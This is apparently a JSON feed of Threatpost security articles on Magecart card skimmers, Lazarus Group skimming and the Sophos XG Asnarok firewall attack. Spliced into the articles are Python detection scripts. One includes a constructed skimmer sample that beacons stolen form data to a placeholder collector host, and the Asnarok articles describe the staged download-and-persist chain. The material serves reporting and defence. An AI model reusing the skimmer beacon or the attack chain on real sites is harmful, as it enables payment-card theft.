It uses generic phishing to gather and sell personal information, for which it has a dedicated store called \u201cBlueMagicStore.\u201d In the web-skimming arena, the group is harvesting financial data during e-commerce checkouts, and selling credit-card information on its carding store, which is named \u201cCardHouse.\u201d\n\nBoom! is certainly not the group\u2019s only target: \u201cIn late September, we noticed a number of new domains that were registered and following the same pattern we had seen before with this group,\u201d researchers wrote. \u201cHowever, this group was quite active in the summer and continues on a well-established pattern seen a year ago.\u201d\n", "cvss3": {}, "published": "2020-10-06T17:39:35", "type": "threatpost", "title": "Boom! 
Mobile Customer Data Lost to Fullz House/Magecart Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-10-06T17:39:35", "id": "THREATPOST:0AF6471C8950B312AA2DB603A5C2F82F", "href": "https://threatpost.com/boom-mobile-customer-data-fullz-house-magecart/159887/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:22:50", "description": "A faction under the Magecart umbrella, Magecart Group 8, targeted the website of the blender manufacturer, NutriBullet, in an attempt to steal the payment-card data of its online customers.\n\nYonathan Klijnsma, threat researcher with RiskIQ, said [in a Wednesday post](<https://www.riskiq.com/blog/labs/magecart-nutribullet/>) that JavaScript web skimmer code was first inserted on the website of the blender retailer (nutribullet.com) on Feb. 20, specifically targeting the website\u2019s checkout page, where customers input their payment information. As of Tuesday, NutriBullet said that it has removed the malicious code.\n\n\u201cNutriBullet takes cybersecurity and personal privacy extremely seriously and is dedicated to the protection of our customers,\u201d NutriBullet said in a statement to Threatpost. \u201cOur IT team immediately sprang into action [March 17] upon first learning from RiskIQ about a possible breach. The company\u2019s IT team promptly identified malicious code and removed it. We have launched forensic investigations to determine how the code was compromised and have updated our security policies and credentials to include Multi-Factor Authentication as a further precaution. Our team will work closely with outside cyber security specialists to prevent further incursions. We thank RiskIQ for bringing this issue to our attention.\u201d\n\nHackers inject web skimmers into targeted websites; these scripts are designed to steal data entered into online payment forms on e-commerce websites. 
When a visitor goes to that website, these skimmers (such as the popular [Pipka](<https://threatpost.com/pipka-card-skimmer-removes-itself-after-infecting-ecommerce-sites/150341/>) or [Inter](<https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html>)) will then scoop up personal details entered on the site.\n\n**The Skimmers**\n\nThe web skimmer that researchers first discovered on NutriBullet\u2019s site uses a page check (via a simple regex, which is a sequence of characters that defines a search pattern) to investigate whether the current browser page looks like a payment page. Once the variables are verified and the page correctly identified as a payment page, the code will call the skimming function. This skimming functionality will grab victims\u2019 payment information as they enter it into the payment field on the website, and then exfiltrate it to attacker-controlled servers.\n\nAfter multiple attempts to contact NutriBullet and receiving no response, RiskIQ decided to initiate the takedown of the attacker exfiltration domain with the help of Swiss security site AbuseCH, and the Shadowserver Foundation, a nonprofit security organization that focuses on malicious internet activity (NutriBullet, for their part, said they had not heard from researchers until March 17).\n\n\u201cGroup 8 operators were using this domain to receive stolen credit-card information, and its takedown prevented there being new victims,\u201d said researchers.\n\nDespite taking down the attacker exfiltration domain, researchers said that they observed the skimmer being removed on March 1, only to be replaced with a new skimmer (and a new exfiltration URL) on the website on March 5. Researchers said they believe that the attackers may have removed the skimmer and set up a new domain after the initial domain was blocked. 
Researchers again worked with AbuseCH and ShadowServer to take down the new domain; but then, they found another skimmer on the NutriBullet website yet again on March 10. This latest skimmer however had the same, now-defunct domain as the previous one.\n\n\u201cAt the time the attackers placed the skimmer in this new script, we had already taken down the domain they used for receiving data,\u201d said researchers. \u201cWe believe the attackers saw that traffic dropped and assumed NutriBullet had cleaned up its site. They then moved the skimmer elsewhere without realizing the domain was defunct.\u201d\n\n**Magecart Threat**\n\nResearchers said they are familiar with the specific skimmer code used in this incident, as it has been used at least since 2018 by Group 8 \u2013 the Magecart group responsible for previous attacks on bedding and pillow manufacturers [Amerisleep and MyPillow](<https://threatpost.com/magecart-mypillow-emerisleep-attack/143022/>), as well as Philippine broadcast company ABS-CBN. Group 8 is one of many factions under the [Magecart](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>) umbrella, which has made headlines over the past year or so for high-profile breaches of companies like [VisionDirect](<https://threatpost.com/visiondirect-blindsided-by-magecart-in-data-breach/139223/>), [Ticketmaster](<https://threatpost.com/ticketmaster-breach-just-one-part-of-a-wide-ranging-campaign/133892/>) and more.\n\nThis group is unique in that it focuses on individual victims, rather than taking the \u201cshotgun approach\u201d of other Magecart groups that compromises many websites at once. This has proved to be a lucrative technique for the group: For instance, in 2019, Group 8 targeted an unnamed national diamond exchange, allowing them to hit all the exchange\u2019s localized websites at the same time, said researchers.\n\n\u201cHighly targeted, highly technical breaches may become a trend,\u201d said researchers. 
\u201cAs we saw in the attacks on NutriBullet and other victims, there are a variety of ways to attack the functionality of a website. Operatives with the right acumen and enough time will find them.\u201d\n", "cvss3": {}, "published": "2020-03-18T09:00:27", "type": "threatpost", "title": "Magecart Cyberattack Targets NutriBullet Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-18T09:00:27", "id": "THREATPOST:07CDA6601F0919DC6946C150BBBE8900", "href": "https://threatpost.com/magecart-cyberattack-targets-nutribullet-website/153855/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:29:12", "description": "When we think of \u201csecuring our website\u201d from attackers, we often think of securing against hooded figures somewhere in Eastern Europe working out of a smoky office above an illegal gambling den. 
Not only is that probably geographically insensitive, it\u2019s also not necessarily the threat that should get your attention in the risk column of your next CISO briefing.\n\nWell, you might ask, \u201cwhat _should_ I be focusing on?\u201d The answer: There\u2019s a growing number of issues related to third- and fourth-party scripts running on your company website, so this is a good place to start.\n\nWaterfall chart example.\n\nConsider a classic webpage waterfall chart: This is a chart that shows you what elements of your web page are loading, and how long each of those elements is taking to load. This can help you answer page-optimization questions such as which of these elements can be reordered or possibly combined, or which of these particular artifacts are mandatory and which ones can be removed. \nThis is the area of interest that most security teams are not looking into. And I\u2019m not talking about page-load times \u2014 I\u2019m talking about all of those \u201celements\u201d that are loading each time a user visits your website.\n\nWhat could we expect to see there besides visible webpage elements? Well, we might see some JavaScript placed there for advertising tech purposes, marketing automation or possibly user personalization reasons. Let\u2019s not forget the trusty analytics packages that pretty much everyone in the world has loading on their pages. Not only are these resources there to help your webpages perform better, give you information you need about your visitors and provide other sorts of optimization for your site, they\u2019re also a majorly underappreciated source of malicious potential for an attacker.\n\nLet\u2019s look at what happens when these resources and their perceived trust are abused by attackers. 
In 2013, a group known as the [Syrian Electronic Army](<https://threatpost.com/syrian-electronic-army-hacks-cnn-social-media-microsoft-transparency-data/103869/>) (SEA) compromised a marketing and recommendation partner for three of the major news outlets in the United States. Because the scripts that were sent to these three news outlets were \u201ctrusted\u201d as part of their marketing agreement, they were promptly loaded into every page load for every user that came to visit the sites that day. And when any user clicked on a recommended news article, they were automatically taken to the website for the SEA.\n\nThe above \u201chack\u201d seems like a cool way to get people to come to your website, but what else could be pulled off using similar techniques \u2014 perhaps something more malicious? And is this still a possibility today?\n\nYes, and yes! Last year, a collective of at least six attacker groups who have come to be [known as Magecart](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>) exploited a similar weakness to wreak havoc on several online retailers. Uncovered by researchers at RiskIQ and Flashpoint, these groups were able to take more than just the joy out of the holiday season by using [formjacking](<https://www.experian.com/blogs/ask-experian/what-is-formjacking/>) and X-Frame options to perform [clickjacking](<https://www.owasp.org/index.php/Clickjacking>) through malicious JavaScript code injected into third-party web elements.\n\nThe attackers, using what are still not totally known methods, were able to inject malicious JavaScript into the online retailers\u2019 shopping cart applications, allowing them to perform card-skimming operations, which in some cases led to the full data breach of associated customer records. 
[British Airways](<https://threatpost.com/british-airways-e-ticketing-flaw-exposes-passenger-flight-personal-data/147260/>) in the UK, for instance, lost over 300,000 customer records as part of its Magecart breach.\n\nThere have been some solid recommendations made on how to combat this problem, such as using security response headers. These can be used to communicate security policy settings to any web browser that is interacting with your website.\n\nUnfortunately, most organizations aren\u2019t making significant use of these headers. Some believe that web application firewall security protections can thwart these types of attacks (which they cannot, because the client side is what\u2019s running the malicious JavaScript). For others it\u2019s too cumbersome to consider, since the list of headers isn\u2019t static, and continually changes over time \u2013 so organizations are unwilling to manage that process. Another possibility is simple ignorance with regard to the depth of the issue.\n\nThere are also a few sites that can scan your organization\u2019s website for free and give you a simple scorecard to get you started on your journey to correcting the script problem. A few of them are:\n\n * <https://securityheaders.com/>\n * <https://observatory.mozilla.org/>\n * <https://www.hardenize.com/>\n\nSince this problem is not the full responsibility of a website owner themselves, but instead stems from the relationship to potentially exploited partner JavaScript code, this should be considered a supply-chain attack. 
But how does one ensure that all third- and fourth-party code is secure before you allow it to run against your clients?\n\nAn emerging possibility is your own injection of client-side JavaScript into a user\u2019s browser \u2013 to be used for good.\n\nThis type of capability is categorized as Runtime Web Application Self-Protection (RWASP), and if implemented correctly, it can bridge the gap left by the endless variability of partner-side code scanning. It gives the browser itself the ability to make runtime decisions about what it\u2019s actually seeing load during that full-page waterfall we looked at before, via a good JavaScript that can detect unwanted or malicious script functionality.\n\nAdditionally, this new validation and monitoring check can be run in an ongoing manner rather than as a one-time audit.\n\nWe\u2019re approaching the biggest time of the year for e-commerce activity \u2013 and for malicious card-skimming attacks as a result. By implementing some of these ideas, you can help make sure that this holiday season, your company may only be in the headlines for the right reasons.\n\n**_Tony Lauro is director of security strategy at Akamai._**\n", "cvss3": {}, "published": "2019-11-14T15:18:49", "type": "threatpost", "title": "Website, Know Thyself: What Code Are You Serving?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-14T15:18:49", "id": "THREATPOST:91752358A60874F9C9D448BB279A8192", "href": "https://threatpost.com/website-know-thyself-what-code-are-you-serving/150257/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:37", "description": "With Magento 1 reaching end-of-life (EOL) on Tuesday, Adobe is making a last-ditch effort to urge the 100,000 online stores still running the outdated 
version to migrate to Magento 2.\n\nMagento is a popular, Adobe-owned open-source e-commerce platform that powers many online shops. After June 30 (Tuesday of this week), Adobe is pulling the plug on security fixes for Magento Commerce 1.14 and Magento Open Source 1 (formerly known as Enterprise Edition and Community Edition, respectively). E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n\n\u201cThousands of merchants have already migrated to Magento 2,\u201d according to a recent [Magento update](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>). \u201cIt is the best solution for growing businesses to succeed and thrive in digital commerce. Magento 2 offers a wealth of built-in features that are not available in Magento 1, plus infrastructure that is easier to maintain and support.\u201d\n\nWith the number of active users of Magento 1 [still topping 100,000](<https://sansec.io/magento-usage-data>), the looming EOL date opens up various cybersecurity issues. The [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>), which has [previously targeted](<https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/>) the platform in order to inject card-skimming scripts onto checkout pages, is the biggest concern for security researchers. 
And security holes continue to pop up in the platform \u2013 [just last week](<https://helpx.adobe.com/security/products/magento/apsb20-41.html>) Adobe issued fixes for critical- and important-severity flaws in Magento 1.14.4.5 and earlier versions, warning that the security update was the final one for Magento 1.\n\nAs of Tuesday, e-commerce sites using the outdated Magento version will also be out of compliance with [the PCI DSS standard](<https://www.pcisecuritystandards.org/document_library>) (the Payment Card Industry Data Security Standard), a security standard for organizations handling credit cards that aims to help reduce credit card fraud. [Requirement 6](<https://www.pcisecuritystandards.org/documents/PCI_DSS-QRG-v3_2_1.pdf?agreement=true&time=1587662200387>) of the PCI DSS requires merchants to \u201cdevelop and maintain secure systems and applications by installing applicable vendor-supplied security patches,\u201d which merchants cannot do once security patches for Magento 1 stop.\n\n\u201cOnce a version of Magento Commerce software is no longer supported, it falls out of PCI compliance and it is your responsibility to re-certify compliance,\u201d according to [Adobe](<https://magento.com/sites/default/files8/2019-09/implications-of-unsupported-software-FAQ.pdf>). \u201cMerchants may be subject to fines or removal of credit card processing ability if you are unable to update vulnerabilities from regular scans and penetration testing.\u201d\n\nAdobe isn\u2019t the only company urging websites to update. [PayPal](<https://www.paypal.com/gp/smarthelp/article/magento-1-end-of-life-announcement-ts2249>) and [Visa](<https://usa.visa.com/content/dam/VCOM/global/support-legal/documents/acquirer-advisory-magento-migration.pdf>) have also issued alerts, saying that PCI DSS requirements apply to merchant integrations with card payment brands. 
And according to a [report by ZDNet](<https://www.zdnet.com/article/adobe-mastercard-visa-warn-online-store-owners-of-magento-1-x-eol/>), Mastercard also recently sent customers security alerts warning them to update to avoid cyberattacks.\n\nMagento 1\u2019s EOL has been a long time coming. [Magento 2 was released](<https://magento.com/blog/best-practices/migrating-magento-2-what-2-know>) in 2015 with various improved features, including better performance and a mobile-friendly admin interface (for reference, the most current version of Magento [is Magento 2.3.5,](<https://magento.com/tech-resources/download>) released in April). The imminent June 2020 EOL for Magento 1 was then announced in September 2018, months after Adobe acquired [Magento in May 2018](<https://news.adobe.com/news/news-details/2018/Adobe-to-Acquire-Magento-Commerce/default.aspx>). Since then, Magento has been working with technology vendors, developers, customers and partners on transition plans to the new version.\n\nEnd-of-life timelines often leave lagging companies in security hot water. [With Flash Player\u2019s](<https://threatpost.com/adobe-prompts-users-to-uninstall-flash-player-as-eol-date-looms/156794/>) Dec. 31, 2020 kill date quickly approaching, for instance, Adobe said that it will start prompting users to uninstall the software in the coming months.\n\n\u201cAny time software reaches end-of-life there is the risk of attackers discovering new vulnerabilities that will remain unpatched,\u201d Zach Varnell, Senior AppSec Consultant at nVisium, told Threatpost. \u201cThere may even be existing vulnerabilities that are not yet publicly known. Attackers could just sit on those issues and not reveal them until after the EOL date, ensuring that they will have longer to use them.\u201d\n", "cvss3": {}, "published": "2020-06-29T18:56:11", "type": "threatpost", "title": "Tuesday\u2019s Magento 1 EOL Leaves Clock Ticking on 100K Online Stores", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-29T18:56:11", "id": "THREATPOST:A30E6A4920ABDF2ACEDA56240984C9FD", "href": "https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:17:16", "description": "The Lazarus Group, state-sponsored hackers affiliated with North Korea, has added digital payment-card skimming to its repertoire, researchers said, using Magecart code.\n\nLazarus members are targeting online payments made by American and European shoppers. Among the victims is Claire\u2019s, the fashion accessory chain that was attacked in June, according to an analysis from Sansec issued on Monday.\n\nResearchers said that the infrastructure used in the attacks is the same that has been seen in previous Lazarus operations; and that \u201cdistinctive patterns in the malware code were identified that linked multiple hacks to the same actor.\u201d\n\nThe analysis found that Lazarus was likely planting Magecart payment skimmers on major online retailer sites as early as May 2019. 
[Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) is an umbrella term encompassing several different threat groups who typically use the same card-skimming scripts on checkout pages. Magento-based attacks are seen most often, but Magecart also attacks other e-commerce platforms, including Opencart, BigCommerce, Prestashop and Salesforce.\n\n\u201cIn order to intercept transactions, an attacker needs to modify the computer code that runs an online store,\u201d according to [the writeup](<https://sansec.io/research/north-korea-magecart>). \u201c[Lazarus Group, a.k.a. Hidden Cobra] managed to gain access to the store code of large retailers such as [international fashion chain Claire\u2019s](<https://threatpost.com/claires-customers-magecart-payment-card-skimmer/156552/>).\u201d\n\nThe researchers speculated that Lazarus is using spearphishing emails as its initial infection vector to compromise the sites \u2013 an effort ultimately aimed at obtaining the passwords of retail staff. The hackers then use that access to inject the skimming script, which captures information that shoppers enter into e-commerce check-out pages. The data is then sent to hacker-controlled servers via a global exfiltration network.\n\n\u201cThis network utilizes legitimate sites, that got hijacked and repurposed to serve as disguise for the criminal activity,\u201d explained the firm. \u201cThe network is also used to funnel the stolen assets so they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, which include a modeling agency from Milan, a vintage music store from Tehran and a family-run book store from New Jersey.\u201d\n\nResearchers uncovered the ongoing campaign last summer, when the firm discovered a skimmer on a U.S. truck-parts store that used the compromised Italian modeling site to harvest payment data. 
During the following months, they discovered the same uniquely encoded malware on several dozen stores, all using the same hijacked sites as loaders and card collectors.\n\nResearchers identified multiple independent links between recent skimming activity and previously documented North Korean hacking operations. These include shared infrastructure (the same domain registrar and DNS service, and common loader sites), as well as an odd code snippet that Sansec has not observed anywhere else.\n\n\u201cThe injected script customize-gtag.min.js is scrambled with a popular JavaScript obfuscator. Hidden in the code, the string WTJ4cFpXNTBWRzlyWlc0OQ== is found, which is the double-base64 encoded representation of clientToken=,\u201d according to the analysis. \u201cThis particular keyword is later used as HTTP GET parameter to send the stolen payload to the collector exfiltration node. The specific encoding and the attempt to disguise the stolen payload as \u2018clientToken\u2019 form a uniquely identifying characteristic.\u201d\n\nThere are also common behavior patterns such as adding a hidden, dynamic image to the page with the deceptive name (__preloader). The image address is controlled by the attacker, and the intercepted and encoded payload is sent as an argument to this image, along with several random numbers.\n\n\u201cDoes the usage of common loader sites, and the similarity in time frame, prove that the DPRK-attributed operations are run by the same actor as the skimming operations?\u201d the researchers said. \u201cTheoretically, it is possible that different nefarious actors had simultaneous control over the same set of hijacked sites, but in practice, this would be extremely unlikely. First, thousands of sites get hacked each day, making an overlap highly coincidental. 
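The indicator Sansec describes is cheap to check for: the string is ordinary base64 applied twice, and the beacon is a fixed marker name. The following Python is an added example, not Sansec's or Threatpost's code, that peels layered base64 off every long base64-looking token in a script body and flags the two traits above, the double-encoded clientToken= keyword and the __preloader image beacon. The script it scans is constructed here to mimic the described behaviour; the collector hostname in it is a placeholder, not a real exfiltration node.

```python
import base64
import binascii
import re

# Runs of base64 alphabet long enough to hide a keyword (short identifiers that
# happen to match are discarded below because they do not decode cleanly).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")

# Traits Sansec tied to the Lazarus skimmer (see the article).
ENCODED_KEYWORD = "clientToken="   # shipped as WTJ4cFpXNTBWRzlyWlc0OQ==
BEACON_MARKER = "__preloader"      # hidden image whose URL carries the payload


def unwrap_base64(token, max_layers=4):
    """Peel base64 off `token` while each layer decodes to printable ASCII.

    Returns (innermost_text, layers_removed); layers_removed is 0 when the
    token was never valid base64, in which case the token is returned as-is.
    """
    current, layers = token, 0
    while layers < max_layers:
        try:
            text = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not text.isprintable():
            break
        current, layers = text, layers + 1
    return current, layers


def scan_script(js_source):
    """Return (kind, evidence) findings for one script body."""
    findings = []
    for match in B64_TOKEN.finditer(js_source):
        token = match.group(0)
        decoded, layers = unwrap_base64(token)
        if layers and ENCODED_KEYWORD in decoded:
            findings.append(("encoded-keyword",
                             f"{token} -> {decoded} ({layers} layers)"))
    # The beacon needs no decoding: the attacker-chosen name is used verbatim.
    if BEACON_MARKER in js_source:
        findings.append(("image-beacon", BEACON_MARKER))
    return findings


# Constructed sample modelled on the behaviour the article describes.
# The host is a placeholder (.invalid), not a real collector.
SAMPLE_JS = r"""
var __preloader = new Image();
var key = atob(atob("WTJ4cFpXNTBWRzlyWlc0OQ=="));
__preloader.src = "https://collector.invalid/p.gif?" + key + btoa(form)
                  + "&" + Math.random();
"""

if __name__ == "__main__":
    for kind, evidence in scan_script(SAMPLE_JS):
        print(kind, evidence)
```

The layer count is part of the signal: a keyword that only appears after two decodes is exactly the trait the researchers single out, while a single-layer hit is commonplace in legitimate minified code.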
Secondly, when a site gets hacked, it is common practice for a perpetrator to close the exploited vulnerability after gaining access, in order to shield the new asset from competitors.\u201d\n\nNorth Korean hacking activity is [aimed at both espionage](<https://threatpost.com/u-s-ties-lazarus-to-north-korea-and-major-hacking-conspiracy/137264/>) and at making money for the regime, and Sansec pointed out that the move into digital skimming represents a significant expansion.\n\n\u201c[North Korea-backed attacks were] mostly restricted to banks and [South Korean crypto markets](<https://threatpost.com/lazarus-tactics-cryptocurrency-attacks/143249/>), covert cyber operations that earned hackers $2 billion, according to a 2019 United Nations report,\u201d concluded the report. \u201cAs Sansec\u2019s new research shows, they have now extended their portfolio with the profitable crime of digital skimming.\u201d\n
", "cvss3": {}, "published": "2020-07-06T17:18:59", "type": "threatpost", "title": "Lazarus Group Adds Magecart to the Mix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-06T17:18:59", "id": "THREATPOST:1ACF78FAC848A424ADE5DEE520B43051", "href": "https://threatpost.com/lazarus-group-adds-magecart/157167/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:21:57", "description": "Researchers have observed a new skimmer from the prolific Magecart Group that has been actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months.\n\n[RiskIQ](<https://www.riskiq.com/>) researchers first discovered the skimmer, dubbed MakeFrame for its use of iframes to skim data, on Jan. 24. Since then, they\u2019ve captured several different versions of the skimmer with \u201cvarious levels of obfuscation,\u201d researchers Jordan Herman and Mia Ihm wrote in a blog post published Thursday.\n\nThe versions range from development versions in clear code to finalized versions using encrypted obfuscation, they wrote.\n\n\u201cThis version of the skimmer is the classic Magecart blob of hex-encoded terms and obfuscated code,\u201d Herman and Ihm wrote. \u201cIt is nestled in amongst benign code to blend in and avoid detection.\u201d\n\nMakeFrame also leeches off the compromised site for its functionality, a technique that in particular signaled to researchers that MakeFrame is most likely the work of Magecart Group 7. 
Targeting SMB sites, as MakeFrame does, is also indicative of Magecart Group 7 activity, researchers said.\n\n\u201cIn some cases, we\u2019ve seen MakeFrame using compromised sites for all three of its functions \u2014 hosting the skimming code itself, loading the skimmer on other compromised websites and exfiltrating the stolen data,\u201d Herman and Ihm wrote.\n\nIndeed, Magecart Group 7 typically uses victim sites for skimmer development, which was also observed when the group [compromised OXO](<https://threatpost.com/data-exposed-oxo-amazon-mongodb/140802/>) in 2017 and in activity by the group in 2018, researchers wrote.\n\n\u201cIn all of these cases, the skimmer is hosted on the victim domain,\u201d according to the analysis. \u201cThe stolen data is posted back to the same server or sent to another compromised domain.\u201d\n\nAnother aspect of MakeFrame that links the new skimmer back to Magecart Group 7 is its method of exfiltrating data once it\u2019s stolen, Herman and Ihm noted. The skimmer sends stolen data in the form of .PHP files to other compromised sites for exfiltration, they said.\n\n\u201cEach compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,\u201d the researchers added.\n\nMagecart Group 7 is one of a number of threat actors operating under the [Magecart](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) umbrella, which includes several different groups who all use a similar attack vector. 
[Magecart attacks](<https://threatpost.com/magecart-variant-tactics-mitm-phishing/150628/>) compromise websites \u2013 principally built on the Magento e-commerce platform \u2013 to inject card-skimming scripts on checkout pages to steal customer payment-card details and other data entered into the page\u2019s fields.\n\nThe group has been active since 2016 and consistently switches tactics to target e-commerce platforms to steal people\u2019s payment and other credentials.\n\n[Skimmers](<https://threatpost.com/macys-data-breach-linked-to-magecart/150393/>) are the primary weapons of choice for the various Magecart groups, but they have also engaged in other nefarious activities such as [brute-forcing passwords](<https://threatpost.com/magecart-cybergang-targets-0days-in-third-party-magento-extensions/138547/>), [spoofing third-party payment sites](<https://threatpost.com/rooster-teeth-attack-magecart/151216/>) and even targeting [Wi-Fi routers](<https://threatpost.com/magecart-group-targets-routers-behind-public-wi-fi-networks/148662/>) with malicious code to steal customer data.\n\nThe latest skimmer uncovered by RiskIQ shows the group\u2019s \u201ccontinued evolution, honing tried-and-true techniques and developing new ones all the time,\u201d researchers wrote.\n\nThe onset of stay-at-home orders amid the [COVID-19 pandemic](<https://threatpost.com/who-attacked-possible-apt-covid-19-cyberattacks-double/154083/>) also seems to have inspired Magecart to bolster activity as more people conduct business online, with many brick-and-mortar shops and shopping malls closed, researchers noted.\n\n\u201cRiskIQ data shows Magecart attacks have grown 20 percent amid the COVID-19 pandemic,\u201d Herman and Ihm wrote. 
\u201cWith many home-bound people forced to purchase what they need online, the digital-skimming threat to e-commerce is as pronounced as ever.\u201d\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduce reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. 
_**\n", "cvss3": {}, "published": "2020-04-02T13:10:33", "type": "threatpost", "title": "Emerging MakeFrame Skimmer from Magecart Sets Sights on SMBs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-02T13:10:33", "id": "THREATPOST:D000B56E417D094837C498C6A759A338", "href": "https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:20:50", "description": "Attackers have been targeting the Sophos XG Firewall (both physical and virtual versions) using a zero-day exploit, according to the security firm \u2013 with the ultimate goal of dropping the Asnarok malware on vulnerable appliances.\n\nSophos said [in a posting](<https://community.sophos.com/kb/en-us/135412>) updated on Monday that the bug in question is a pre-authentication SQL injection vulnerability (a CVE is forthcoming) that leads to remote code execution (RCE). It affects systems configured with either the administration interface (called the \u201cHTTPS admin service\u201d) or the user portal exposed to the WAN zone.\n\n\u201cIn addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or user portal were also affected,\u201d the firm explained. \u201cFor reference, the default configuration of XG Firewall is that all services operate on unique ports.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIf hackers were able to access an exposed XG device, the Asnarok trojan was then installed, which is designed to exfiltrate data housed on the XG firewall itself. Sophos said that the sample is an ELF binary executable malware that has been specifically compiled for a firewall operating system.\n\n\u201cThe data exfiltrated for any impacted firewall includes all local usernames and hashed passwords of any local user accounts,\u201d Sophos noted. 
\u201cFor example, this includes local device admins, user portal accounts and accounts used for remote access. Passwords associated with external authentication systems such as Active Directory (AD) or LDAP were not compromised.\u201d\n\nSophos issued a hotfix this week for the issue.\n\n## **Initial Compromise: A Chain of Linux Scripts**\n\nThe attack consists of a chain of Linux shell scripts, the firm said, hosted on an innocuous-sounding yet malicious domain, sophosfirewallupdate[.]com.\n\n\u201cThere was significant orchestration involved in the execution of the attack,\u201d according to Sophos.\n\nThe kill chain begins with the SQL injection exploit, which allows the attackers to insert a one-line command into a database table on a targeted device, according to a Sunday [technical analysis](<https://news.sophos.com/en-us/2020/04/26/asnarok/>) from Sophos. That injected command triggers a download of the first Linux shell script, named Install.sh, from the remote server.\n\nThis script is written to the appliance\u2019s /tmp directory as \u201cx.sh.\u201d It turns out to be an installer that goes on to drop two new shell scripts, and it also modifies an existing operating-system script in a bid for persistence.\n\nThe first of the new shell scripts, .lp.sh, connects to the sophosfirewallupdate site to download a Linux ELF executable named lp, which is written to /tmp under the filename b.\n\n_The firewall attack kill chain, per Sophos._\n\n\u201cThe b program, when run, deletes itself from the filesystem of the device, so it is only present in memory,\u201d Sophos explained. \u201cThen, it repeats a series of tasks every three to six hours.\u201d\n\nThe first of these tasks is to connect to the IP address 43.229.55.44. If that fails, it tries the malicious domain sophosproductupdate[.]com. 
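Because the chain leaves named files in /tmp, beacons to fixed hosts and appends commands to an existing OS script, a hunt can be keyed on those artifacts. The following Python is an added example, not Sophos' tooling, that checks a file listing, outbound-connection log lines and a shell script's text against the dropped-file names, the two domains and the IP addresses this article attributes to the Asnarok chain. The listing, the key=value log format and the script text are constructed for the demo.

```python
import re

# Network indicators Sophos attributed to the campaign (defanged, as in the article).
C2_DOMAINS = {"sophosfirewallupdate[.]com", "sophosproductupdate[.]com"}
C2_IPS = {"43.229.55.44", "38.27.99.69"}

# Names of files the chain writes; the leading dots keep them out of a plain `ls`.
DROPPED_NAMES = {"x.sh", ".lp.sh", ".pg.sh", ".post_MI", "2own", "Info.xg"}
# `b` (the downloaded lp binary) is only suspicious when it sits under /tmp.
TMP_ONLY_NAMES = {"b"}


def refang(indicator):
    """Turn the defanged form back into a matchable hostname."""
    return indicator.replace("[.]", ".")


def c2_hosts():
    return {refang(d) for d in C2_DOMAINS} | C2_IPS


def hunt_files(paths):
    """Return the entries of a file listing that match a dropped-file name."""
    hits = []
    for path in paths:
        directory, _, name = path.rpartition("/")
        if name in DROPPED_NAMES or (directory == "/tmp" and name in TMP_ONLY_NAMES):
            hits.append(path)
    return hits


# Constructed log format: space-separated key=value pairs, one connection per line.
DST_FIELD = re.compile(r"\bdst=(\S+)")


def hunt_connections(log_lines):
    """Return (line, indicator) pairs for connections to a known C2 host."""
    bad = c2_hosts()
    hits = []
    for line in log_lines:
        m = DST_FIELD.search(line)
        if m and m.group(1) in bad:
            hits.append((line, m.group(1)))
    return hits


def script_references_c2(script_text):
    """True if a shell script mentions a C2 host: the persistence trick the
    article describes appends download commands to an existing OS script."""
    return any(host in script_text for host in c2_hosts())


# Constructed samples for the demo (not data from a real appliance).
SAMPLE_LISTING = [
    "/tmp/x.sh", "/tmp/.lp.sh", "/tmp/b", "/tmp/sess_0a1b",
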